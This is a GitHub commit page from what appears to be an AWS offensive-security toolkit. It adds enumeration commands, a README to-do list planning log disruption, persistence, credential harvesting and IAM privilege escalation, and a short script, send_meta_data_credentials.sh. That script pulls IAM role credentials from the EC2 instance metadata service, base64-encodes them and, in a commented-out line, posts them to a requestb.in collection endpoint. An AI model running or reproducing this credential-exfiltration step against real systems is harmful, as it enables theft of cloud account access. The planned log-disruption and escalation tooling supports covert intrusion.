I forgot what I did :(

thepawn1 · Nov 2, 2016 · e11e084 · e11e084
1 parent 3d893a5
commit e11e084
Show file tree

Hide file tree

Showing 4 changed files with 40 additions and 2 deletions.
diff --git a/.gitignore b/.gitignore
@@ -111,3 +111,6 @@ ENV/
 
 # Rope project settings
 .ropeproject
+
+# Non-public stuff
+elevation/bouncy_bouncy_cloudy_cloud.py
diff --git a/README.md b/README.md
@@ -88,3 +88,19 @@ Other things that I was either to stupid or too lazy to classify.
 * integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
 * download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.
 
+## To do
+
+* Dump stack resources
+* Validate mfa
+* Add more calls to dump_account_data
+* Add more log disruption methods
+* Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
+* Create an s3 bucket permission enumerator
+* Fix up persistence scripts to use arguments instead of constants inside the scripts
+* Create tool to grab aws credentials from common places on disk
+* Create cloning tool
+* Create silly privelege escalation tool that uses iam putpolicy etc
+* Create silly privelege escalation tool that uses passrole
+* Validate queues
+* Validate notification topics
+* Dump CF stack resources including deleted
diff --git a/elevation/send_meta_data_credentials.sh b/elevation/send_meta_data_credentials.sh
@@ -0,0 +1,5 @@
+#!/bin/bash
+instance_profile=`curl http://169.254.169.254/latest/meta-data/iam/security-credentials/`
+curl http://169.254.169.254/latest/meta-data/iam/security-credentials/${instance_profile} > /tmp/garbage
+garbage=`base64 -w 0 /tmp/garbage`
+#curl -X POST -d "garbage=${garbage}" http://requestb.in/REQUESTIBINID
diff --git a/exploration/dump_account_data.sh b/exploration/dump_account_data.sh
@@ -146,9 +146,23 @@ aws directconnect describe-virtual-gateways > directconnect-describe-virtual-gat
 # https://docs.aws.amazon.com/cli/latest/reference/directconnect/describe-virtual-interfaces.html
 aws directconnect describe-virtual-interfaces > directconnect-describe-virtual-interfaces.json
 
+# https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/index.html
+###
+# https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/describe-trails.html
+aws cloudtrail describe-trails > cloudtrail-describe-trails.json
+# https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/list-public-keys.html
+aws cloudtrail list-public-keys > cloudtrail-list-public-keys.json
 
-
-
+# https://docs.aws.amazon.com/cli/latest/reference/cloudformation/
+###
+# https://docs.aws.amazon.com/cli/latest/reference/cloudformation/describe-account-limits.html
+aws cloudformation describe-account-limits > cloudformation-describe-account-limits.json
+# https://docs.aws.amazon.com/cli/latest/reference/cloudformation/describe-stacks.html
+aws cloudformation describe-stacks > cloudformation-describe-stacks.json
+# https://docs.aws.amazon.com/cli/latest/reference/cloudformation/list-exports.html
+aws cloudformation list-exports > cloudformation-list-exports.json
+# https://docs.aws.amazon.com/cli/latest/reference/cloudformation/list-stacks.html
+aws cloudformation list-stacks > cloudformation-list-stacks.json